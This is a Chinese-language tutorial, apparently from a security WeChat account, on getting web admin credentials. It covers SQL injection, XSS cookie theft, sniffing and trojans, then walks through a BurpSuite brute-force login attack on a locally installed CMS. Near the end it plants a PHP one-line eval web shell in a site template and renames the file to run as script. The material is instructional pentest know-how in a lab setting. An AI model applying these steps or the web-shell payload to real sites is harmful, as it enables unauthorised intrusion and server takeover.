免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
——鼹鼠
在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。
1.web后台账号及密码获取思路
在本文中,我们将深入探讨Web后台登录口令爆破破解的原理、攻击手段以及防御措施。为了更好地理解这些问题,我们将在文中引用一些参考文献来支持我们的观点和论述。这些参考文献来自多个领域,包括网络安全、密码学、计算机科学等,它们为我们提供了丰富的理论和实践经验,帮助我们更好地理解和应对Web后台登录口令爆破破解的威胁。通过综合分析和引用相关文献,我们将为读者呈现一个全面、深入的Web后台登录口令爆破破解及防御的探讨。
1.通过sql注入获取后台账号及密码
如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。
2.通过跨站获取管理员帐号及密码
在前台页面中插入xss代码,通过xss平台接收。当管理员访问存在跨站页面时,会将网站管理员登录的cookie值等信息传回到xss平台,有的还可以直接获取管理员账号及密码。xss平台可以自己搭建,也可以使用网上公开的平台,例如http://xsspt.com/index.php?do=login、http://imxss.com/等。
3.通过暴力破解获取管理员帐号及密码
目前有一些工具支持后台账号及密码暴力破解,例如BurpSuite等,在本文后面会重点介绍使用BurpSuite进行后台账号及密码暴力破解。
4.通过获取数据库备份文件
有些网站由于管理失误,将数据库打包放在网站根目录,或者数据库备份文件存在于某个目录,通过目录泄露及浏览等漏洞可以直接获取数据库备份文件。在本地将其还原后,即可获取所有数据。
5.嗅探获取
对C段服务器进行渗透,或者对该目标CMS所在网络进行渗透,渗透成功后,通过Cain等工具对目标CMS的登录后台用户及口令进行嗅探。
6.其它方法
如果知道管理员的信息,可以给管理员发送木马程序,诱使其执行,控制其个人计算机后,可以通过键盘记录等方法来获取管理员账号及口令。当然也有可能管理员IE等浏览器会保存登录账号及口令。
2设置BurpSuite进行网站后台破解
1.启动BurpSuite
本次使用PentestBox中的BurpSuite,在PentestBox目录下启动PentestBox.exe程序,
命令:
cd D:\PentestBoxbinBurpSuite
目录
执行命令:
java -jar BurpSuite.jar
即可启动BurpSuite程序,如图1所示,注意执行cd命令后,使用“d:”切换到d盘当前目录,否则无法启动。pentestbox 是一个综合漏洞测试平台,跟kali比较类似,其官方站点:
https://pentestbox.org/zh/
运行环境为Windows。
3.BurpSuite启动设置
BurpSuite的启动设置比较简单,单击“Next”及“Start burp”即可,如果是专业版则需要注册码,也即需要注册许可进行注册才能使用专业版功能。
3设置IE等浏览器代理
(1)设置Chrome代理
在Chrome浏览器中单击“设置”-“高级”-“系统”-“打开代理”,在“Internet属性”窗口中单击“局域网设置”,在局域网设置窗口的代理服务器中分别设置地址127.0.0.1,端口为8080,如图2所示,同时单击“高级”设置对所有协议均使用相同的代理服务器。
图2设置浏览器代理
(2)设置BurpSuite代理
单击“Proxy”-“Options”,如图3所示,设置“Interface”值为127.0.0.1:8080,默认情况下不需要进行修改。
4.测试前准备工作
comsenz测试平台
测试平台选择在Windows下安装comsenz (官方网站:http://www.comsenz.com/)程序下载地址:http://download2.comsenz.com/ComsenzEXP/x2.5/ComsenzEXP_X25GBK.exe,下载后执行安装即可,安装完毕后记住MySQL数据库root账号的密码(默认为1111111),然后将其代码所在全部文件移除到其他文件目录。例如本例安装D:ComsenzEXPwwwroot,则需要将wwwroot下所有文件剪切到其它位置。
2.测试cms系统
测试cms系统选择稻草人cms系统,下载地址http://www.dcrcms.com
/news.php?id=2,选择1.0.5版本即可。下载地址:http://www.dcrcms.com/uploads/program/dcr_qy(gbk)_1.0.5.1.rar。将该cms压缩包解压后,全部复制到
D:ComsenzEXPwwwroot
目录,然后在浏览器中打开http://127.0.0.1进行cms安装,根据提示即可完成安装,在安装前需要创建一个数据库,例如dcr,安装完成后,第一次使用默认密码admin/admin进行登录,将admin密码修改为abc123。
3.在浏览器中使用随机密码进行登录
如图4所示,打开地址http://127.0.0.1/dcr_qy(utf)_1.0.5/dcr/login.htm,在用户名及密码中分别输入admin/admin进行登录,登录结果显示“您输入的用户名或密码,请重新输入”,完成一次交互登录,由于是错误的密码,因此未能进入后台,由于安装程序的编码版本不一样,有些可能会显示乱码。
5.使用BurpSuite进行暴力破解
1放行数据包
单击“Proxy”-“Intercept”,如图5所示,单击“Forward”放行数据包通过,单击“Drop”丢弃抓包数据,如果设置“Intercept is off”则不用进行放行操作。在设置浏览器代理时一定要查看本地地址,如果对本地进行测试,则需要进行清除,也即所有地址全部使用代理,否则访问测试网站地址后在BurpSuite中没有数据包。
2.查看抓包情况
在BurpSuite中单击“HTTP History”,如图6所示,可以看到第3条历史为本次测试数据,选中该记录右键单击选择“Send to Intruder”。
3设置 Intruder
(1)设置变量§
在
Intruder中对
username=§admin§&password=§admin§&admin_yz=§5781§&x=§37§&y=§9§
进行设置,设置其值为:
username=admin&password=§admin§&admin_yz=5781&x=37&y=9
也即去掉username前的变量§以及x=37&y=9中的变量§,添加与去掉§变量,在BurpSuite的右方单击“Add §”及“Clear §”按钮即可。测试变量时一定仅仅保持password的变量,对cookie等中的变量也全部去除掉。
(2)设置字典
单击“Payloads”,在其中设置如图8所示,单击“Load”装载密码字典。Payload Sets中设置为“1”,“Simple list”,密码个数为3018。
(3)捕获出错信息
经过提交错误的密码后,其浏览器会反馈一个结果,如图9所示,将其复制到剪贴板中,
鎮ㄨ緭鍏ョ殑鐢ㄦ埛鍚嶆垨瀵嗙爜锛岃閲嶆柊杈撳叆
信息值用来判断密码登录出错的反馈值。
(4)设置错误反馈Flag
在Intruder窗口单击“Options”,在Add右边的输入框中粘帖刚才复制的值
鎮ㄨ緭鍏ョ殑鐢ㄦ埛鍚嶆垨瀵嗙爜锛岃閲嶆柊杈撳叆
如图10所示,该值一定是原始值。
4.执行暴力破解
在Intruder中,单击“Target”-“Start attack”后,会弹出一个警示窗口,确定即可,如图11所示,BurpSuite将会根据设置进行暴力破解。
5.查看暴力破解结果
在BurpSuite破解结束后,可以对Length进行排序,如图12所示,显示长度不一致的结果即为破解成功的记录,在本案例中有两个密码,其密码分别为18和39位,均为破解成功,也即密码为abc123。
6.成功登录后台
重新使用admin/abc123进行登录,如图13所示,成功登录后台。
1.5后台获取webshell
1.文件模板管理
如图14所示,单击“模板管理”-“模板文件管理器”,可以对其中的模板文件进行编辑以及改名等操作。
2.模板文件插入一句话后门代码
在模板文件管理器中选择left.html网页模板文件,如图15所示,在其中粘帖一句话
后门代码:
003C?php @eval($_POST['chopper2012']);?>
单击“修改”,保存模板文件。
3.重命名模板文件
如图16所示,将原文件名更名为left.php,保存修改;在有些情况下,可能无法进行模板重命名为脚本文件,如果网站服务器存在IIS等解析漏洞,则可以使用1.asp;.html类似名称来命名。
原文始发于微信公众号(天盾信安):web后台登录口令暴力破解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论